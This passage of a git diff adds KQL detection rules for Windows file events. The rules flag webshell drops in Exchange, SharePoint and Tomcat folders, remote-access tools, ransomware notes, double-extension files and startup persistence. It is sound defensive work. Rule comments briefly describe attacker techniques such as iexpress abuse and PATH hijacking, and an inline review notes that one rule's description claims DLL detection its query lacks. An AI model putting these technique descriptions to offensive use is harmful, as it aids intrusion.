+| where FolderPath endswith ".scr" and (not((FolderPath contains ":\\$WINDOWS.~BT\\NewOS\\" or FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\" or FolderPath contains ":\\Windows\\WinSxS\\" or FolderPath contains ":\\WUDownloadCache\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/screenconnect_temporary_installation_artefact.kql b/KQL/rules/windows/file/file_event/screenconnect_temporary_installation_artefact.kql
new file mode 100644
index 00000000..3510f5fa
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/screenconnect_temporary_installation_artefact.kql
@@ -0,0 +1,14 @@
+// Title: ScreenConnect Temporary Installation Artefact
+// Author: frack113
+// Date: 2022-02-13
+// Level: medium
+// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
+// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Legitimate use
+
+DeviceFileEvents
+| where FolderPath contains "\\Bin\\ScreenConnect."
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/self_extraction_directive_file_created_in_potentially_suspicious_location.kql b/KQL/rules/windows/file/file_event/self_extraction_directive_file_created_in_potentially_suspicious_location.kql
new file mode 100644
index 00000000..15b419c0
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/self_extraction_directive_file_created_in_potentially_suspicious_location.kql
@@ -0,0 +1,12 @@
+// Title: Self Extraction Directive File Created In Potentially Suspicious Location
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2024-02-05
+// Level: medium
+// Description: Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location.
+// These files are used by the "iexpress.exe" utility in order to create self extracting packages.
+// Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceFileEvents
+| where (FolderPath contains ":\\ProgramData\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Windows\\System32\\Tasks\\" or FolderPath contains ":\\Windows\\Tasks\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains "\\AppData\\Local\\Temp\\") and FolderPath endswith ".sed"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/startup_folder_file_write.kql b/KQL/rules/windows/file/file_event/startup_folder_file_write.kql
new file mode 100644
index 00000000..e150e9e2
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/startup_folder_file_write.kql
@@ -0,0 +1,12 @@
+// Title: Startup Folder File Write
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-05-02
+// Level: medium
+// Description: A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+// - FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate
+
+DeviceFileEvents
+| where FolderPath contains "\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp" and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\wuauclt.exe", "C:\\Windows\\uus\\ARM64\\wuaucltcore.exe")) or (FolderPath startswith "C:\\$WINDOWS.~BT\\NewOS\\" or FolderPath startswith "C:\\$WinREAgent\\Scratch\\Mount\\")))) and (not((InitiatingProcessFolderPath endswith "\\ONENOTE.EXE" and FolderPath endswith "\\Send to OneNote.lnk")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_aspx_file_drop_by_exchange.kql b/KQL/rules/windows/file/file_event/suspicious_aspx_file_drop_by_exchange.kql
new file mode 100644
index 00000000..7399237b
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_aspx_file_drop_by_exchange.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious ASPX File Drop by Exchange
+// Author: Florian Roth (Nextron Systems), MSTI (query, idea)
+// Date: 2022-10-01
+// Level: high
+// Description: Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1505.003
+
+DeviceFileEvents
+| where (InitiatingProcessCommandLine contains "MSExchange" and InitiatingProcessFolderPath endswith "\\w3wp.exe" and (FolderPath contains "FrontEnd\\HttpProxy\\" or FolderPath contains "\\inetpub\\wwwroot\\aspnet_client\\")) and (FolderPath endswith ".aspx" or FolderPath endswith ".asp" or FolderPath endswith ".ashx")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_binaries_and_scripts_in_public_folder.kql b/KQL/rules/windows/file/file_event/suspicious_binaries_and_scripts_in_public_folder.kql
new file mode 100644
index 00000000..b896cc0c
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_binaries_and_scripts_in_public_folder.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Binaries and Scripts in Public Folder
+// Author: The DFIR Report
+// Date: 2025-01-23
+// Level: high
+// Description: Detects the creation of a file with a suspicious extension in the public folder, which could indicate potential malicious activity.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204
+// False Positives:
+// - Administrators deploying legitimate binaries to public folders.
+
+DeviceFileEvents
+| where FolderPath contains ":\\Users\\Public\\" and (FolderPath endswith ".bat" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".js" or FolderPath endswith ".ps1" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_binary_writes_via_anydesk.kql b/KQL/rules/windows/file/file_event/suspicious_binary_writes_via_anydesk.kql
new file mode 100644
index 00000000..a8b8ee3c
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_binary_writes_via_anydesk.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Binary Writes Via AnyDesk
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-28
+// Level: high
+// Description: Detects AnyDesk writing binary files to disk other than "gcapi.dll".
+// According to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,
+// which is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+
+DeviceFileEvents
+| where ((InitiatingProcessFolderPath endswith "\\AnyDesk.exe" or InitiatingProcessFolderPath endswith "\\AnyDeskMSI.exe") and (FolderPath endswith ".dll" or FolderPath endswith ".exe")) and (not(FolderPath endswith "\\gcapi.dll"))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_creation_txt_file_in_user_desktop.kql b/KQL/rules/windows/file/file_event/suspicious_creation_txt_file_in_user_desktop.kql
new file mode 100644
index 00000000..87cf389b
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_creation_txt_file_in_user_desktop.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Creation TXT File in User Desktop
+// Author: frack113
+// Date: 2021-12-26
+// Level: high
+// Description: Ransomware create txt file in the user Desktop
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1486
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\cmd.exe" and (FolderPath contains "\\Users\\" and FolderPath contains "\\Desktop\\") and FolderPath endswith ".txt"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_creation_with_colorcpl.kql b/KQL/rules/windows/file/file_event/suspicious_creation_with_colorcpl.kql
new file mode 100644
index 00000000..e633f25d
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_creation_with_colorcpl.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Creation with Colorcpl
+// Author: frack113
+// Date: 2022-01-21
+// Level: high
+// Description: Once executed, colorcpl.exe will copy the arbitrary file to c:\windows\system32\spool\drivers\color\
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\colorcpl.exe" and (not((FolderPath endswith ".icm" or FolderPath endswith ".gmmp" or FolderPath endswith ".cdmp" or FolderPath endswith ".camp")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_deno_file_written_from_remote_source.kql b/KQL/rules/windows/file/file_event/suspicious_deno_file_written_from_remote_source.kql
new file mode 100644
index 00000000..a68ba8a4
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_deno_file_written_from_remote_source.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious Deno File Written from Remote Source
+// Author: Josh Nickels, Michael Taggart
+// Date: 2025-05-22
+// Level: low
+// Description: Detects Deno writing a file from a direct HTTP(s) call and writing to the appdata folder or bringing it's own malicious DLL.
+// This behavior may indicate an attempt to execute remotely hosted, potentially malicious files through deno.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204, attack.t1059.007, attack.command-and-control, attack.t1105
+// False Positives:
+// - Legitimate usage of deno to request a file or bring a DLL to a host
+
+DeviceFileEvents
+| where (FolderPath contains "\\deno\\gen\\" or FolderPath contains "\\deno\\remote\\https\\") and (FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_desktop_ini_action.kql b/KQL/rules/windows/file/file_event/suspicious_desktop_ini_action.kql
new file mode 100644
index 00000000..30ca1cf2
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_desktop_ini_action.kql
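Review bot: The description says the rule also covers Deno "bringing it's own malicious DLL", but the where clause only matches paths under `\deno\gen\` or `\deno\remote\https\` inside a user's AppData — there is no `.dll` condition anywhere in the query. Either the Sigma source has no DLL selection and the description overstates the logic, or a selection was lost in conversion; worth checking the source rule before this ships with that description. The typo `it's` should read `its` in the description line, though that text is presumably copied from upstream and best fixed there.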
@@ -0,0 +1,13 @@
+// Title: Suspicious desktop.ini Action
+// Author: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO)
+// Date: 2020-03-19
+// Level: medium
+// Description: Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.009
+// False Positives:
+// - Operations performed through Windows SCCM or equivalent
+// - Read only access list authority
+
+DeviceFileEvents
+| where FolderPath endswith "\\desktop.ini" and (not(((InitiatingProcessFolderPath startswith "C:\\Windows\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\JetBrains\\Toolbox\\bin\\7z.exe" and FolderPath contains "\\JetBrains\\apps\\") or FolderPath startswith "C:\\$WINDOWS.~BT\\NewOS\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_desktopimgdownldr_target_file.kql b/KQL/rules/windows/file/file_event/suspicious_desktopimgdownldr_target_file.kql
new file mode 100644
index 00000000..eab18902
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_desktopimgdownldr_target_file.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Desktopimgdownldr Target File
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-07-03
+// Level: high
+// Description: Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+// False Positives:
+// - False positives depend on scripts and administrative tools used in the monitored environment
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\svchost.exe" and FolderPath contains "\\Personalization\\LockScreenImage\\") and (not(FolderPath contains "C:\\Windows\\")) and (not((FolderPath contains ".jpg" or FolderPath contains ".jpeg" or FolderPath contains ".png")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_double_extension_files.kql b/KQL/rules/windows/file/file_event/suspicious_double_extension_files.kql
new file mode 100644
index 00000000..2e4cca10
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_double_extension_files.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Double Extension Files
+// Author: Nasreddine Bencherchali (Nextron Systems), frack113
+// Date: 2022-06-19
+// Level: high
+// Description: Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that Windows hide default extensions by default.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.007
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where (FolderPath endswith ".rar.exe" or FolderPath endswith ".zip.exe") or ((FolderPath contains ".doc." or FolderPath contains ".docx." or FolderPath contains ".gif." or FolderPath contains ".jpeg." or FolderPath contains ".jpg." or FolderPath contains ".mp3." or FolderPath contains ".mp4." or FolderPath contains ".pdf." or FolderPath contains ".png." or FolderPath contains ".ppt." or FolderPath contains ".pptx." or FolderPath contains ".rtf." or FolderPath contains ".svg." or FolderPath contains ".txt." or FolderPath contains ".xls." or FolderPath contains ".xlsx.") and (FolderPath endswith ".exe" or FolderPath endswith ".iso" or FolderPath endswith ".rar" or FolderPath endswith ".svg" or FolderPath endswith ".zip"))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_executable_file_creation.kql b/KQL/rules/windows/file/file_event/suspicious_executable_file_creation.kql
new file mode 100644
index 00000000..410a2762
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_executable_file_creation.kql
@@ -0,0 +1,11 @@
+// Title: Suspicious Executable File Creation
+// Author: frack113
+// Date: 2022-09-05
+// Level: high
+// Description: Detect creation of suspicious executable file names.
+// Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564
+
+DeviceFileEvents
+| where FolderPath endswith ":\\$Recycle.Bin.exe" or FolderPath endswith ":\\Documents and Settings.exe" or FolderPath endswith ":\\MSOCache.exe" or FolderPath endswith ":\\PerfLogs.exe" or FolderPath endswith ":\\Recovery.exe" or FolderPath endswith ".bat.exe" or FolderPath endswith ".sys.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_file_created_by_arcsoc_exe.kql b/KQL/rules/windows/file/file_event/suspicious_file_created_by_arcsoc_exe.kql
new file mode 100644
index 00000000..bdbf4ebf
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_file_created_by_arcsoc_exe.kql
@@ -0,0 +1,14 @@
+// Title: Suspicious File Created by ArcSOC.exe
+// Author: Micah Babinski
+// Date: 2025-11-25
+// Level: high
+// Description: Detects instances where the ArcGIS Server process ArcSOC.exe, which hosts REST services running on an ArcGIS
+// server, creates a file with suspicious file type, indicating that it may be an executable, script file,
+// or otherwise unusual.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.command-and-control, attack.persistence, attack.initial-access, attack.t1127, attack.t1105, attack.t1133
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\ArcSOC.exe" and (FolderPath endswith ".ahk" or FolderPath endswith ".aspx" or FolderPath endswith ".au3" or FolderPath endswith ".bat" or FolderPath endswith ".cmd" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".js" or FolderPath endswith ".ps1" or FolderPath endswith ".py" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".wsf")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_file_created_in_outlook_temporary_directory.kql b/KQL/rules/windows/file/file_event/suspicious_file_created_in_outlook_temporary_directory.kql
new file mode 100644
index 00000000..590e74ad
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_file_created_in_outlook_temporary_directory.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious File Created in Outlook Temporary Directory
+// Author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-07-22
+// Level: high
+// Description: Detects the creation of files with suspicious file extensions in the temporary directory that Outlook uses when opening attachments.
+// This can be used to detect spear-phishing campaigns that use suspicious files as attachments, which may contain malicious code.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1566.001
+// False Positives:
+// - Opening of headers or footers in email signatures that include SVG images or legitimate SVG attachments
+
+DeviceFileEvents
+| where (FolderPath endswith ".cpl" or FolderPath endswith ".hta" or FolderPath endswith ".iso" or FolderPath endswith ".rdp" or FolderPath endswith ".svg" or FolderPath endswith ".vba" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs") and ((FolderPath contains "\\AppData\\Local\\Packages\\Microsoft.Outlook_" or FolderPath contains "\\AppData\\Local\\Microsoft\\Olk\\Attachments\\") or (FolderPath contains "\\AppData\\Local\\Microsoft\\Windows\\" and FolderPath contains "\\Content.Outlook\\"))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_file_created_in_perflogs.kql b/KQL/rules/windows/file/file_event/suspicious_file_created_in_perflogs.kql
new file mode 100644
index 00000000..41026715
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_file_created_in_perflogs.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious File Created In PerfLogs
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-05
+// Level: medium
+// Description: Detects suspicious file based on their extension being created in "C:\PerfLogs\". Note that this directory mostly contains ".etl" files
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where (FolderPath endswith ".7z" or FolderPath endswith ".bat" or FolderPath endswith ".bin" or FolderPath endswith ".chm" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".lnk" or FolderPath endswith ".ps1" or FolderPath endswith ".psm1" or FolderPath endswith ".py" or FolderPath endswith ".scr" or FolderPath endswith ".sys" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".zip") and FolderPath startswith "C:\\PerfLogs\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_file_created_via_onenote_application.kql b/KQL/rules/windows/file/file_event/suspicious_file_created_via_onenote_application.kql
new file mode 100644
index 00000000..45759d1a
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_file_created_via_onenote_application.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious File Created Via OneNote Application
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-09
+// Level: high
+// Description: Detects suspicious files created via the OneNote application. This could indicate a potential malicious ".one"/".onepkg" file was executed as seen being used in malware activity in the wild
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - False positives should be very low with the extensions list cited. Especially if you don't heavily utilize OneNote.
+// - Occasional FPs might occur if OneNote is used internally to share different embedded documents
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenotem.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe") and FolderPath contains "\\AppData\\Local\\Temp\\OneNote\\" and (FolderPath endswith ".bat" or FolderPath endswith ".chm" or FolderPath endswith ".cmd" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".htm" or FolderPath endswith ".html" or FolderPath endswith ".js" or FolderPath endswith ".lnk" or FolderPath endswith ".ps1" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".wsf")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_file_creation_activity_from_fake_recycle_bin_folder.kql b/KQL/rules/windows/file/file_event/suspicious_file_creation_activity_from_fake_recycle_bin_folder.kql
new file mode 100644
index 00000000..ab80b0ba
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_file_creation_activity_from_fake_recycle_bin_folder.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious File Creation Activity From Fake Recycle.Bin Folder
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-07-12
+// Level: high
+// Description: Detects file write event from/to a fake recycle bin folder that is often used as a staging directory for malware
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath contains "RECYCLERS.BIN\\" or InitiatingProcessFolderPath contains "RECYCLER.BIN\\") or (FolderPath contains "RECYCLERS.BIN\\" or FolderPath contains "RECYCLER.BIN\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_file_creation_in_uncommon_appdata_folder.kql b/KQL/rules/windows/file/file_event/suspicious_file_creation_in_uncommon_appdata_folder.kql
new file mode 100644
index 00000000..9ec0b518
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_file_creation_in_uncommon_appdata_folder.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious File Creation In Uncommon AppData Folder
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-05
+// Level: high
+// Description: Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where (FolderPath contains "\\AppData\\" and (FolderPath endswith ".bat" or FolderPath endswith ".cmd" or FolderPath endswith ".cpl" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".iso" or FolderPath endswith ".lnk" or FolderPath endswith ".msi" or FolderPath endswith ".ps1" or FolderPath endswith ".psm1" or FolderPath endswith ".scr" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs") and FolderPath startswith "C:\\Users\\") and (not(((FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\AppData\\LocalLow\\" or FolderPath contains "\\AppData\\Roaming\\") and FolderPath startswith "C:\\Users\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_file_drop_by_exchange.kql b/KQL/rules/windows/file/file_event/suspicious_file_drop_by_exchange.kql
new file mode 100644
index 00000000..a30d927a
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_file_drop_by_exchange.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious File Drop by Exchange
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-10-04
+// Level: medium
+// Description: Detects suspicious file type dropped by an Exchange component in IIS
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1190, attack.initial-access, attack.t1505.003
+
+DeviceFileEvents
+| where (InitiatingProcessCommandLine contains "MSExchange" and InitiatingProcessFolderPath endswith "\\w3wp.exe") and (FolderPath endswith ".aspx" or FolderPath endswith ".asp" or FolderPath endswith ".ashx" or FolderPath endswith ".ps1" or FolderPath endswith ".bat" or FolderPath endswith ".exe" or FolderPath endswith ".dll" or FolderPath endswith ".vbs")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_file_write_to_sharepoint_layouts_directory.kql b/KQL/rules/windows/file/file_event/suspicious_file_write_to_sharepoint_layouts_directory.kql
new file mode 100644
index 00000000..b820c610
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_file_write_to_sharepoint_layouts_directory.kql
@@ -0,0 +1,11 @@
+// Title: Suspicious File Write to SharePoint Layouts Directory
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-07-24
+// Level: high
+// Description: Detects suspicious file writes to SharePoint layouts directory which could indicate webshell activity or post-exploitation.
+// This behavior has been observed in the exploitation of SharePoint vulnerabilities such as CVE-2025-49704, CVE-2025-49706 or CVE-2025-53770.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1190, attack.persistence, attack.t1505.003
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe") and (FolderPath contains "\\15\\TEMPLATE\\LAYOUTS\\" or FolderPath contains "\\16\\TEMPLATE\\LAYOUTS\\") and (FolderPath endswith ".asax" or FolderPath endswith ".ascx" or FolderPath endswith ".ashx" or FolderPath endswith ".asmx" or FolderPath endswith ".asp" or FolderPath endswith ".aspx" or FolderPath endswith ".bat" or FolderPath endswith ".cmd" or FolderPath endswith ".cer" or FolderPath endswith ".config" or FolderPath endswith ".hta" or FolderPath endswith ".js" or FolderPath endswith ".jsp" or FolderPath endswith ".jspx" or FolderPath endswith ".php" or FolderPath endswith ".ps1" or FolderPath endswith ".vbs") and (FolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\" or FolderPath startswith "C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\Web Server Extensions\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_file_write_to_webapps_root_directory.kql b/KQL/rules/windows/file/file_event/suspicious_file_write_to_webapps_root_directory.kql
new file mode 100644
index 00000000..91fcbf55
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_file_write_to_webapps_root_directory.kql
@@ -0,0 +1,11 @@
+// Title: Suspicious File Write to Webapps Root Directory
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-10-20
+// Level: medium
+// Description: Detects suspicious file writes to the root directory of web applications, particularly Apache web servers or Tomcat servers.
+// This may indicate an attempt to deploy malicious files such as web shells or other unauthorized scripts.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1505.003, attack.initial-access, attack.t1190
+
+DeviceFileEvents
+| where FolderPath contains "\\webapps\\ROOT\\" and (FolderPath contains "\\apache" or FolderPath contains "\\tomcat") and FolderPath endswith ".jsp" and (InitiatingProcessFolderPath endswith "\\dotnet.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\java.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_files_in_default_gpo_folder.kql b/KQL/rules/windows/file/file_event/suspicious_files_in_default_gpo_folder.kql
new file mode 100644
index 00000000..4d442bf7
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_files_in_default_gpo_folder.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Files in Default GPO Folder
+// Author: elhoim
+// Date: 2022-04-28
+// Level: medium
+// Description: Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1036.005, attack.defense-evasion
+
+DeviceFileEvents
+| where FolderPath contains "\\Policies\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\" and (FolderPath endswith ".dll" or FolderPath endswith ".exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_get_variable_exe_creation.kql b/KQL/rules/windows/file/file_event/suspicious_get_variable_exe_creation.kql
new file mode 100644
index 00000000..fac6cf31
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_get_variable_exe_creation.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Get-Variable.exe Creation
+// Author: frack113
+// Date: 2022-04-23
+// Level: high
+// Description: Get-Variable is a valid PowerShell cmdlet
+// WindowsApps is by default in the path where PowerShell is executed.
+// So when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546, attack.defense-evasion, attack.t1027
+
+DeviceFileEvents
+| where FolderPath endswith "Local\\Microsoft\\WindowsApps\\Get-Variable.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_interactive_powershell_as_system.kql b/KQL/rules/windows/file/file_event/suspicious_interactive_powershell_as_system.kql
new file mode 100644
index 00000000..723776e6
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_interactive_powershell_as_system.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious Interactive PowerShell as SYSTEM
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-12-07
+// Level: high
+// Description: Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+// - Administrative activity
+// - PowerShell scripts running as SYSTEM user
+
+DeviceFileEvents
+| where FolderPath in~ ("C:\\Windows\\System32\\config\\systemprofile\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt", "C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\StartupProfileData-Interactive")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/suspicious_lnk_double_extension_file_created.kql b/KQL/rules/windows/file/file_event/suspicious_lnk_double_extension_file_created.kql
new file mode 100644
index 00000000..ac7926f6
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/suspicious_lnk_double_extension_file_created.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious LNK Double Extension File Created
+// Author: Nasreddine Bencherchali (Nextron Systems), frack113
